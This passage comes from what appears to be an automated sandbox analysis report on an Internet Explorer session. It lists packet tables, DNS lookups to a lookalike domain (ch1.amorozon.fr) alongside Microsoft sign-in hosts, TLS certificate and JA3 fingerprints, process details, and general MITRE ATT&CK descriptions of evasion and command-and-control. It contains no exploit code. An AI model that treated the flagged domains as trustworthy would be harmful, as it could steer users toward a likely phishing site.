Nov 27, 2020 18:44:52.845038891 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845082045 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845099926 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.845118999 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845133066 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.845155954 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845171928 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.845192909 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845211983 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.845220089 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.845247984 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.845268011 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.850908041 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.850995064 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.929615974 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.947293997 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.947433949 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:53.069372892 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:53.086803913 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:53.086843967 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:53.086867094 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:53.087042093 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:53.087110996 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:53.562459946 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:53.562500954 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:53.562601089 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:53.562653065 CET	49733	443	192.168.2.4	170.10.160.34

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 18:44:24.926445007 CET	51703	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:24.953593016 CET	53	51703	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:25.751550913 CET	65248	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:25.778778076 CET	53	65248	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:26.807967901 CET	53723	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:26.835298061 CET	53	53723	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:27.827013969 CET	64646	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:27.854250908 CET	53	64646	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:28.749267101 CET	65298	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:28.776400089 CET	53	65298	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:29.821146011 CET	59123	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:29.856697083 CET	53	59123	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:30.126833916 CET	54531	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:30.166022062 CET	53	54531	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:31.134808064 CET	49714	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:31.145983934 CET	58028	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:31.170399904 CET	53	49714	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:31.288184881 CET	53	58028	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:31.886038065 CET	53097	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:31.913268089 CET	53	53097	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:33.008058071 CET	49257	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:33.035176039 CET	53	49257	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:34.046694994 CET	62389	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:34.073873043 CET	53	62389	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:35.135759115 CET	49910	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:35.164444923 CET	53	49910	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:35.941951036 CET	55854	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:35.953727007 CET	64549	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:35.981486082 CET	53	55854	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:35.989077091 CET	53	64549	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:36.849618912 CET	63153	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:36.877043009 CET	53	63153	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:48.008104086 CET	52991	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:48.043673038 CET	53	52991	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:51.301460981 CET	53700	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:51.328747988 CET	53	53700	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:51.686917067 CET	51726	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:51.714025021 CET	53	51726	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:52.343667984 CET	56794	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:52.392710924 CET	53	56794	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:53.848150969 CET	56534	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:53.875292063 CET	53	56534	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:53.875864983 CET	56627	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:53.902852058 CET	53	56627	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:54.040288925 CET	56621	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.077636003 CET	53	56621	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:54.913369894 CET	63116	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.930263996 CET	64078	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.936012983 CET	64801	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.954541922 CET	53	63116	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:54.956588030 CET	61721	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.968770027 CET	53	64078	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:54.973066092 CET	53	64801	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:54.988466024 CET	51255	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:54.993751049 CET	53	61721	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:55.027426004 CET	53	51255	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:55.548388004 CET	61522	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:55.585103989 CET	53	61522	8.8.8.8	192.168.2.4
Nov 27, 2020 18:44:55.918695927 CET	52337	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:44:55.955785036 CET	53	52337	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:00.127975941 CET	55046	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:00.163790941 CET	53	55046	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:00.769119978 CET	49612	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:00.807770967 CET	53	49612	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:01.115400076 CET	55046	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:01.150887012 CET	53	55046	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:01.769563913 CET	49612	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:01.796804905 CET	53	49612	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:02.129000902 CET	55046	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:02.164833069 CET	53	55046	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:02.838691950 CET	49612	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:02.874520063 CET	53	49612	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:04.144721985 CET	55046	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:04.180174112 CET	53	55046	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:04.832206011 CET	49612	53	192.168.2.4	8.8.8.8
Nov 27, 2020 18:45:04.859301090 CET	53	49612	8.8.8.8	192.168.2.4
Nov 27, 2020 18:45:08.163120985 CET	55046	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 18:44:31.145983934 CET	192.168.2.4	8.8.8.8	0x8dfe	Standard query (0)	ch1.amorozon.fr	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:35.941951036 CET	192.168.2.4	8.8.8.8	0x9d	Standard query (0)	goips.net	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:48.008104086 CET	192.168.2.4	8.8.8.8	0xf529	Standard query (0)	ch1.amorozon.fr	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:51.686917067 CET	192.168.2.4	8.8.8.8	0x7c1	Standard query (0)	signup.live.com	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:52.343667984 CET	192.168.2.4	8.8.8.8	0xde41	Standard query (0)	acctcdn.msauth.net	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:53.848150969 CET	192.168.2.4	8.8.8.8	0xe43c	Standard query (0)	client.hip.live.com	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:54.913369894 CET	192.168.2.4	8.8.8.8	0x7939	Standard query (0)	ajax.aspnetcdn.com	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:54.988466024 CET	192.168.2.4	8.8.8.8	0xc3b6	Standard query (0)	assets.onestore.ms	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 18:44:31.288184881 CET	8.8.8.8	192.168.2.4	0x8dfe	No error (0)	ch1.amorozon.fr		170.10.160.34	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:35.981486082 CET	8.8.8.8	192.168.2.4	0x9d	No error (0)	goips.net		104.27.129.197	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:35.981486082 CET	8.8.8.8	192.168.2.4	0x9d	No error (0)	goips.net		172.67.151.211	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:35.981486082 CET	8.8.8.8	192.168.2.4	0x9d	No error (0)	goips.net		104.27.128.197	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:48.043673038 CET	8.8.8.8	192.168.2.4	0xf529	No error (0)	ch1.amorozon.fr		170.10.160.34	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:51.714025021 CET	8.8.8.8	192.168.2.4	0x7c1	No error (0)	signup.live.com	account.msa.msidentity.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:51.714025021 CET	8.8.8.8	192.168.2.4	0x7c1	No error (0)	account.msa.msidentity.com	account.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:52.392710924 CET	8.8.8.8	192.168.2.4	0xde41	No error (0)	acctcdn.msauth.net	acctcdn.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:52.392710924 CET	8.8.8.8	192.168.2.4	0xde41	No error (0)	scdn1efff.wpc.9da5e.alphacdn.net	sni1gl.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:52.392710924 CET	8.8.8.8	192.168.2.4	0xde41	No error (0)	sni1gl.wpc.alphacdn.net		152.199.21.175	A (IP address)	IN (0x0001)
Nov 27, 2020 18:44:53.875292063 CET	8.8.8.8	192.168.2.4	0xe43c	No error (0)	client.hip.live.com	na.privatelink.msidentity.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:53.875292063 CET	8.8.8.8	192.168.2.4	0xe43c	No error (0)	na.privatelink.msidentity.com	prdf.aadg.msidentity.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:53.875292063 CET	8.8.8.8	192.168.2.4	0xe43c	No error (0)	prdf.aadg.msidentity.com	www.tm.f.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:54.954541922 CET	8.8.8.8	192.168.2.4	0x7939	No error (0)	ajax.aspnetcdn.com	mscomajax.vo.msecnd.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:44:55.027426004 CET	8.8.8.8	192.168.2.4	0xc3b6	No error (0)	assets.onestore.ms	assets.onestore.ms.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 27, 2020 18:44:31.567331076 CET	170.10.160.34	443	192.168.2.4	49723	CN=ch1.amorozon.fr CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Nov 27 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Fri Feb 26 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 27, 2020 18:44:31.567374945 CET	170.10.160.34	443	192.168.2.4	49724	CN=ch1.amorozon.fr CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Nov 27 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Fri Feb 26 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 27, 2020 18:44:36.037096024 CET	104.27.129.197	443	192.168.2.4	49729	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jul 26 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Mon Jul 26 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:36.037096024 CET	104.27.129.197	443	192.168.2.4	49729	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:48.300569057 CET	170.10.160.34	443	192.168.2.4	49733	CN=ch1.amorozon.fr CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Nov 27 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Fri Feb 26 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 27, 2020 18:44:52.573888063 CET	152.199.21.175	443	192.168.2.4	49738	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.573888063 CET	152.199.21.175	443	192.168.2.4	49738	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574557066 CET	152.199.21.175	443	192.168.2.4	49743	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574557066 CET	152.199.21.175	443	192.168.2.4	49743	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574670076 CET	152.199.21.175	443	192.168.2.4	49742	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574670076 CET	152.199.21.175	443	192.168.2.4	49742	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574790955 CET	152.199.21.175	443	192.168.2.4	49739	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574790955 CET	152.199.21.175	443	192.168.2.4	49739	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574922085 CET	152.199.21.175	443	192.168.2.4	49740	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.574922085 CET	152.199.21.175	443	192.168.2.4	49740	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.575181961 CET	152.199.21.175	443	192.168.2.4	49741	CN=identitycdn.msauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Oct 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Tue Oct 05 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 18:44:52.575181961 CET	152.199.21.175	443	192.168.2.4	49741	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 2044 Parent PID: 800

General

Start time:	18:44:29
Start date:	27/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff676d00000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 5140 Parent PID: 2044

General

Start time:	18:44:30
Start date:	27/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2044 CREDAT:17410 /prefetch:2
Imagebase:	0xf70000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
